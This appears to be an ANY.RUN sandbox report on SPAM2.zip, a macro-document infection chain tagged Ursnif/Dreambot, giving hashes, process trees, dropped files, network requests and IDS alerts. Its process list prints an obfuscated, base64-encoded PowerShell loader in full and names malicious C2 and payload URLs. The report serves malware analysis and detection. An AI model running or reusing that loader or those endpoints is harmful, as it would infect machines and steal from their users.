analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SPAM2.zip

Full analysis: https://app.any.run/tasks/5b764b83-ddfe-4f86-818e-16824ef812fd
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 11:58:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
macros
macros-on-open
gozi
ursnif
trojan
dreambot
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

BFE8B22A0E690876E9D4E24AB942E753

SHA1:

013E8D18CBC964F3A2D0B58FD922E19F6EC28288

SHA256:

A457C9F2D3C5E52D4DCC77656AC650D82C9097EADE7DB71B73E137A096DCD249

SSDEEP:

12288:kERQjJvIJQ31UgiXOU4kfcw3YOEiS7tXgfD0gIKLsPxkp5IHsUNln7I:fQjJvIJC1slfc9OEi++ogIKLsPx+54sn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • gril5.reb.exe (PID: 2988)

    • Drops known JS loader

      • WINWORD.EXE (PID: 1476)

    • Executes scripts

      • WINWORD.EXE (PID: 1476)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1476)

    • URSNIF was detected

      • powershell.exe (PID: 2072)
      • IEXPLORE.EXE (PID: 1844)
      • IEXPLORE.EXE (PID: 2360)

    • Connects to CnC server

      • IEXPLORE.EXE (PID: 1844)
      • IEXPLORE.EXE (PID: 2360)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2428)

    • Reads the machine GUID from the registry

      • WinRAR.exe (PID: 2428)
      • WScript.exe (PID: 2748)
      • powershell.exe (PID: 2072)

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2428)

    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 1476)
      • powershell.exe (PID: 2072)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2748)

    • Creates files in the user directory

      • powershell.exe (PID: 2072)

    • Executed via COM

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 1644)

    • Removes files from Windows directory

      • powershell.exe (PID: 2072)

  • INFO

    • Manual execution by user

      • gril5.reb.exe (PID: 2988)
      • WinRAR.exe (PID: 1576)
      • WINWORD.EXE (PID: 1476)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 1252)
      • WINWORD.EXE (PID: 1476)
      • iexplore.exe (PID: 1644)
      • iexplore.exe (PID: 2868)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1252)
      • WINWORD.EXE (PID: 1476)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1476)
      • IEXPLORE.EXE (PID: 2360)

    • Changes internet zones settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 1644)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 1644)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 1844)
      • IEXPLORE.EXE (PID: 2360)

    • Changes settings of System certificates

      • iexplore.exe (PID: 2868)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 2868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: gril5.reb.exe
ZipUncompressedSize: 1642496
ZipCompressedSize: 553256
ZipCRC: 0x357922c8
ZipModifyDate: 2019:09:19 13:55:26
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe gril5.reb.exe winword.exe no specs winrar.exe no specs winword.exe no specs wscript.exe no specs #URSNIF powershell.exe iexplore.exe #URSNIF iexplore.exe iexplore.exe no specs #URSNIF iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2428"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SPAM2.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2988"C:\Users\admin\Desktop\gril5.reb.exe" C:\Users\admin\Desktop\gril5.reb.exe
explorer.exe
User:
admin
Company:
Whatpath Boeing
Integrity Level:
HIGH
Description:
TakePage
Exit code:
0
Version:
4.6.51.39
1252"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2428.35304\info_09_19.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
1576"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\SPAM2.zip" C:\Users\admin\Desktop\C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
9
Version:
5.60.0
1476"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\info_09_19.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
2748"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\zGjagpXxv.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2072"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAZgBjADAAOQBDADQASgBRAEYATQBiAHgAcgArAEkAZwBuAEsASwA2AFoAaQBGAHAASQBRADEAWgBFAEkAZwAwAEMAQwA0AE8AdgBuAFQAUwBHACsAcQA1ADYAaQAyAHoAVAA1ADgAMQBOAEUAWABUAHMAegB6ADgALwBtAHEASABpAGMAMQBHAFUATQBFAEUAcwBKAHYAUgBNAE0AawBWAFUAdwBsAGoAeABjAFAASQBqADEAaQBBAFMAYgBSAHoATwBYAHIAKwBSAGwARwBIAE0AMwBNAG8AcQBGAHkASwBuAGMAUABSADMAWQA4AGcAbAAxAEsAcwBOAGUAMQBDAHMAbwB4ADUAOABXAFEAcABsAFYAcAByAEwAVQB6ADkAcABQAFYAUwBaAHkASQBYADIAOABMAE8ARwBsADQAWQByAE0ARQBFAHAAZwByAHMAMQBtAEgAQQBxAHoATgAxAGIAZQBoAGoASwBjAEwAVgBmAE0ANwB3AGcAVABEACsANQB3AHQAcQB1AEcAbABsAHgAcgBXAG0ANQBkADMAOABWAEkAagBmADYAdgA0AGQAKwBJAFYAYQBYAC8AUQBGACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAEEAZABUAG8ARQBOAEQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAZQB4ACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2868"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1844"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2868 CREDAT:275457 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1644"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
3 527
Read events
2 777
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
9
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
1252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB705.tmp.cvr
MD5:
SHA256:
1252WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E0C39D24-60C9-4CB6-AD5A-5BDB494F13FE}.tmp
MD5:
SHA256:
1476WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF055.tmp.cvr
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BOTDN1NAHRMKIVNY7PK4.temp
MD5:
SHA256:
2868iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFCC2386C3ADD855C8.TMP
MD5:
SHA256:
2868iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF278039AE31DB836C.TMP
MD5:
SHA256:
2868iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FC6D8938-DAD4-11E9-9008-5254004AAD21}.dat
MD5:
SHA256:
1644iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFF0EED1ECFB225445.TMP
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF160786.TMPbinary
MD5:4C55FB736B5823D4C1F277BE226111D3
SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:4C55FB736B5823D4C1F277BE226111D3
SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
11
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2360
IEXPLORE.EXE
GET
200
194.87.237.74:80
http://c54aavse.com/images/ReV17ZxRx/GIH7Ze4aITxE7cJR8XHm/AgYTaBi2D3TmfWMCVXb/ahXAl70PQrn90aLf6H5z_2/FnW1yFJcUmZqm/wHpPb7PQ/JLLGnvkbhWJnjqSfyRXCvL3/KyoTOkp_2F/jsM1t8E8okICxqb5I/1Rvh3zMkl/VYK1.avi
RU
malicious
2868
iexplore.exe
GET
304
152.199.19.161:443
https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml
US
whitelisted
2072
powershell.exe
GET
404
185.65.202.69:80
http://fotmailz.com/s9281P/yt1.php?l=gril5.reb
RU
malicious
2868
iexplore.exe
GET
200
152.199.19.161:443
https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin
US
whitelisted
1844
IEXPLORE.EXE
GET
404
172.217.22.46:80
http://google.com/images/2qHnriFHNLHSS/H1Y7LxKh/sc5f1_2F4ia18CHI2KWS2_2/FO4Gr_2FEU/6c4q1fBi5hPD6T38I/XzJRfM2xQRv7/BTat7uFvhsq/EmxJjc1ITktXZ_/2BoK9E4pbOiaY7m_2Bn1W/dvdEOVNrWV_2BC3e/Hxb30VK_2FQPmnZi/16Z.avi
US
html
1.71 Kb
whitelisted
2868
iexplore.exe
GET
200
152.199.19.161:443
https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml
US
xml
352 Kb
whitelisted
1844
IEXPLORE.EXE
GET
200
172.217.18.4:80
http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
US
image
3.10 Kb
whitelisted
2868
iexplore.exe
GET
200
152.199.19.161:443
https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin
US
binary
16 b
whitelisted
1844
IEXPLORE.EXE
GET
200
172.217.18.4:80
http://www.google.com/images/errors/robot.png
US
image
6.18 Kb
whitelisted
2360
IEXPLORE.EXE
GET
200
194.87.237.74:80
http://c54aavse.com/favicon.ico
RU
image
5.30 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2072
powershell.exe
185.65.202.69:80
fotmailz.com
Individual Entrepreneur Kulin Tomofei Konstantinovich
RU
malicious
2360
IEXPLORE.EXE
194.87.237.74:80
c54aavse.com
JSC Mediasoft ekspert
RU
malicious
1844
IEXPLORE.EXE
172.217.22.46:80
google.com
Google Inc.
US
whitelisted
2868
iexplore.exe
152.199.19.161:443
r20swj13mr.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1844
IEXPLORE.EXE
172.217.18.4:80
www.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
fotmailz.com
  • 185.65.202.69
malicious
pori89g5jqo3v8.com
suspicious
google.com
  • 172.217.22.46
whitelisted
www.google.com
  • 172.217.18.4
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
c54aavse.com
  • 194.87.237.74
malicious

Threats

PID
Process
Class
Message
2072
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
1844
IEXPLORE.EXE
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2360
IEXPLORE.EXE
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
SPAM2.zip